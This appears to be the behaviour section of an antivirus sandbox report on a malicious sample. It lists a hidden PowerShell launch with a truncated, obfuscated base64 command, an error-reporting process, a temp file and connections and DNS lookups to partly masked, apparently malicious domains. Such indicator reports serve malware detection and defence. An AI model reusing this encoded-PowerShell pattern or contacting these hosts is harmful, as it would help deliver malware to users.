Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD cwBFAHQALQBJAHQARQBtACAAdgBhAFIAaQBBAEIAbABFADoAaQAzADkAMgA0ADYAIAAoACAAWwB0AHkAUABlAF0AKAAnAFMAJwArACcAeQBTAHQAJwArACcARQBtAC4AaQBPAC4AZABJAHIAZQBDAFQAbwAnACsAJwByAHkAJw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1540
- %TEMP%\1033881.cvr
- 'gr####ges.org.my':443
- 'da####harmajobs.com':80
- 'gr####ges.org.my':443
- DNS ASK ro##ie.in
- DNS ASK en######bconsulting.co.za
- DNS ASK gr####ges.org.my
- DNS ASK da####harmajobs.com
- DNS ASK co#####aladvance.com
- DNS ASK ro###night.in
- DNS ASK gy###scle.tk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD cwBFAHQALQBJAHQARQBtACAAdgBhAFIAaQBBAEIAbABFADoAaQAzADkAMgA0ADYAIAAoACAAWwB0AHkAUABlAF0AKAAnAFMAJwArACcAeQBTAHQAJwArACcARQBtAC4AaQBPAC4AZABJAHIAZQBDAFQAbwAnACsAJwByAHkAJw...' (со скрытым окном)